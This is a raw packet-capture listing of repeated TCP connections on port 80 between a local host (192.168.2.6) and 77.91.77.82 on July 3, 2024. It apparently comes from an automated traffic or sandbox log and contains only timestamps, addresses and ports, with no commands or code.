                                                                Jul 3, 2024 08:41:26.303517103 CEST4993580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:26.303561926 CEST4993680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:26.303688049 CEST4993680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:26.308666945 CEST804993677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:27.002172947 CEST804993677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:27.002330065 CEST4993680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.115319967 CEST4993780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.115344048 CEST4993680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.120388985 CEST804993777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:27.120557070 CEST4993780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.120592117 CEST804993677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:27.125051022 CEST4993780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.125147104 CEST4993680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.129875898 CEST804993777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:27.832392931 CEST804993777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:27.832493067 CEST4993780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.847642899 CEST4993780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.848102093 CEST4993880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.852749109 CEST804993777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:27.852802992 CEST4993780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.852885962 CEST804993877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:27.852941036 CEST4993880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.853854895 CEST4993880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:27.858618975 CEST804993877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:28.541518927 CEST804993877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:28.545123100 CEST4993880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:28.658323050 CEST4993880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:28.661031961 CEST4993980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:28.664155960 CEST804993877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:28.664257050 CEST4993880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:28.665923119 CEST804993977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:28.669142008 CEST4993980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:28.671710968 CEST4993980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:28.676659107 CEST804993977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:29.385629892 CEST804993977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:29.389113903 CEST4993980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:29.392246962 CEST4994080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:29.392254114 CEST4993980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:29.397115946 CEST804994077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:29.397682905 CEST804993977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:29.401101112 CEST4994080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:29.401125908 CEST4993980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:29.401324034 CEST4994080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:29.406071901 CEST804994077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:30.087981939 CEST804994077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:30.088069916 CEST4994080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.209394932 CEST4994080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.209773064 CEST4994180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.214533091 CEST804994077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:30.214559078 CEST804994177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:30.214581966 CEST4994080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.214659929 CEST4994180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.214984894 CEST4994180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.219731092 CEST804994177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:30.904282093 CEST804994177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:30.905004025 CEST4994180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.908343077 CEST4994180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.908694029 CEST4994280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.913455009 CEST804994177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:30.913501978 CEST804994277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:30.913644075 CEST4994180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.913644075 CEST4994280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.914145947 CEST4994280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:30.919456005 CEST804994277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:31.621330023 CEST804994277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:31.621440887 CEST4994280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:31.737478018 CEST4994280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:31.737922907 CEST4994380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:31.742834091 CEST804994377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:31.742897034 CEST4994380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:31.743119001 CEST4994380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:31.743158102 CEST804994277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:31.743268013 CEST4994280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:31.749488115 CEST804994377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:32.451313972 CEST804994377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:32.451482058 CEST4994380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:32.454991102 CEST4994380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:32.454991102 CEST4994480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:32.459919930 CEST804994477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:32.460035086 CEST4994480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:32.460180044 CEST804994377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:32.460211992 CEST4994480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:32.460525036 CEST4994380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:32.464988947 CEST804994477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:33.134119987 CEST804994477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:33.134233952 CEST4994480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.252078056 CEST4994480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.252557039 CEST4994580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.257371902 CEST804994477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:33.257397890 CEST804994577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:33.257491112 CEST4994480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.257500887 CEST4994580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.257997990 CEST4994580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.262896061 CEST804994577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:33.950771093 CEST804994577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:33.950864077 CEST4994580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.954180002 CEST4994580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.954529047 CEST4994680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.959355116 CEST804994577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:33.959367990 CEST804994677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:33.959409952 CEST4994580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.959506989 CEST4994680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.959709883 CEST4994680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:33.964463949 CEST804994677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:34.647690058 CEST804994677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:34.647782087 CEST4994680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:34.752242088 CEST4994780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:34.752284050 CEST4994680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:34.757203102 CEST804994777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:34.757369041 CEST4994780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:34.757534027 CEST804994677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:34.757725954 CEST4994680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:34.757950068 CEST4994780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:34.762762070 CEST804994777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:35.459625006 CEST804994777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:35.459680080 CEST4994780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:35.463109016 CEST4994780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:35.463639975 CEST4994880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:35.468581915 CEST804994877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:35.468599081 CEST804994777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:35.468660116 CEST4994780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:35.468677044 CEST4994880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:35.469023943 CEST4994880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:35.474049091 CEST804994877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:36.149766922 CEST804994877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:36.149831057 CEST4994880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.269021034 CEST4994880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.269351006 CEST4994980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.276005983 CEST804994877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:36.276034117 CEST804994977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:36.276067972 CEST4994880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.276125908 CEST4994980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.276586056 CEST4994980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.283047915 CEST804994977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:36.961729050 CEST804994977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:36.961815119 CEST4994980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.964859009 CEST4994980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.965298891 CEST4995080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.970494032 CEST804994977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:36.970508099 CEST804995077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:36.970597982 CEST4994980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.970597982 CEST4995080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.970745087 CEST4995080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:36.976253033 CEST804995077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:37.973217010 CEST804995077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:37.973284960 CEST4995080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:37.973684072 CEST804995077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:37.973730087 CEST4995080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.079942942 CEST4995080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.081034899 CEST4995180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.085218906 CEST804995077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:38.085905075 CEST804995177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:38.085942030 CEST4995080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.085977077 CEST4995180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.089035034 CEST4995180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.093907118 CEST804995177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:38.775779009 CEST804995177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:38.775922060 CEST4995180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.778991938 CEST4995180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.778991938 CEST4995280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.783822060 CEST804995277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:38.783972979 CEST4995280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.784188032 CEST804995177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:38.784215927 CEST4995280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.784812927 CEST4995180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:38.789036036 CEST804995277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:39.471010923 CEST804995277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:39.471112013 CEST4995280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:39.580687046 CEST4995280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:39.581105947 CEST4995380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:39.585901976 CEST804995377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:39.586004019 CEST4995380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:39.586007118 CEST804995277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:39.586055040 CEST4995280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:39.586261034 CEST4995380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:39.591022968 CEST804995377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:40.283138037 CEST804995377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:40.283210039 CEST4995380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:40.287062883 CEST4995380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:40.287412882 CEST4995480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:40.292267084 CEST804995377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:40.292282104 CEST804995477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:40.292321920 CEST4995380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:40.292378902 CEST4995480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:40.292862892 CEST4995480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:40.297647953 CEST804995477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:41.008810997 CEST804995477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:41.009051085 CEST4995480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.126883984 CEST4995480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.127279997 CEST4995580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.132131100 CEST804995477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:41.132174015 CEST804995577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:41.132272959 CEST4995480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.132528067 CEST4995580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.132528067 CEST4995580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.137340069 CEST804995577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:41.871170998 CEST804995577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:41.871237040 CEST4995580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.874658108 CEST4995580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.875067949 CEST4995680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.879729033 CEST804995577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:41.879803896 CEST4995580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.879892111 CEST804995677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:41.879961014 CEST4995680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.880150080 CEST4995680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:41.884938002 CEST804995677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:42.583086014 CEST804995677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:42.583259106 CEST4995680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:42.689867973 CEST4995680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:42.691160917 CEST4995780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:42.695261955 CEST804995677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:42.696021080 CEST804995777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:42.696120024 CEST4995680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:42.696124077 CEST4995780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:42.696311951 CEST4995780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:42.701097965 CEST804995777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:43.369940042 CEST804995777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:43.373153925 CEST4995780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:43.376375914 CEST4995880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:43.376375914 CEST4995780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:43.381287098 CEST804995877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:43.381581068 CEST804995777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:43.381732941 CEST4995880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:43.381732941 CEST4995780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:43.382009029 CEST4995880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:43.386838913 CEST804995877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:44.071279049 CEST804995877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:44.071337938 CEST4995880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.190551043 CEST4995880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.190911055 CEST4995980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.195763111 CEST804995977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:44.195805073 CEST804995877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:44.195837021 CEST4995980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.195858955 CEST4995880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.196171999 CEST4995980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.200978041 CEST804995977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:44.868755102 CEST804995977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:44.869168043 CEST4995980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.872638941 CEST4995980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.872638941 CEST4996080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.877512932 CEST804996077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:44.877764940 CEST4996080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.877867937 CEST4996080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.877883911 CEST804995977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:44.881158113 CEST4995980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:44.882641077 CEST804996077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:45.812581062 CEST804996077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:45.812657118 CEST4996080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:45.812766075 CEST804996077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:45.812813044 CEST4996080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:45.924938917 CEST4996080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:45.925371885 CEST4996180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:45.931647062 CEST804996077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:45.931701899 CEST4996080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:45.931886911 CEST804996177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:45.931956053 CEST4996180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:45.932199001 CEST4996180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:45.938494921 CEST804996177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:46.628957033 CEST804996177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:46.629224062 CEST4996180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:46.632206917 CEST4996180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:46.632206917 CEST4996280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:46.637059927 CEST804996277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:46.637475967 CEST804996177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:46.637696028 CEST4996180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:46.637696028 CEST4996280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:46.637897015 CEST4996280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:46.642647028 CEST804996277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:47.370389938 CEST804996277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:47.373188972 CEST4996280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:47.487699986 CEST4996280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:47.488064051 CEST4996380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:47.703434944 CEST804996277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:47.703886986 CEST4996280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:47.704662085 CEST804996377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:47.704674006 CEST804996277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:47.704770088 CEST4996280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:47.704783916 CEST4996380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:47.705132008 CEST4996380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:47.709537983 CEST804996277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:47.709960938 CEST804996377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:48.399923086 CEST804996377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:48.399991035 CEST4996380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:48.403484106 CEST4996380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:48.403908968 CEST4996480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:48.408629894 CEST804996377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:48.408694983 CEST4996380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:48.408978939 CEST804996477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:48.409051895 CEST4996480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:48.409230947 CEST4996480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:48.414247990 CEST804996477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:49.093168974 CEST804996477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:49.093236923 CEST4996480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:49.205008030 CEST4996480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:49.209076881 CEST4996580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:49.530479908 CEST4996480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:49.538763046 CEST804996577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:49.538778067 CEST804996477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:49.538842916 CEST4996580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:49.538906097 CEST804996477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:49.538948059 CEST4996480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:49.539397955 CEST4996580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:49.544922113 CEST804996577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:50.235721111 CEST804996577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:50.235791922 CEST4996580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:50.238667011 CEST4996580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:50.239011049 CEST4996680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:50.243820906 CEST804996677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:50.243874073 CEST804996577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:50.243877888 CEST4996680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:50.243921041 CEST4996580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:50.244066954 CEST4996680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:50.248868942 CEST804996677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:50.934801102 CEST804996677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:50.937082052 CEST4996680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.049962044 CEST4996680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.050321102 CEST4996780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.055243015 CEST804996777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:51.055335045 CEST4996780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.055346966 CEST804996677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:51.055438042 CEST4996680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.055718899 CEST4996780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.060509920 CEST804996777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:51.774782896 CEST804996777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:51.774837017 CEST4996780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.778409004 CEST4996780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.778877974 CEST4996880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.783518076 CEST804996777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:51.783565998 CEST4996780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.783735037 CEST804996877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:51.783792973 CEST4996880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.784065962 CEST4996880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:51.788917065 CEST804996877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:52.461499929 CEST804996877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:52.461571932 CEST4996880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:52.608361006 CEST4996880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:52.608364105 CEST4996980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:52.613279104 CEST804996977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:52.613535881 CEST804996877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:52.613630056 CEST4996880192.168.2.677.91.77.82
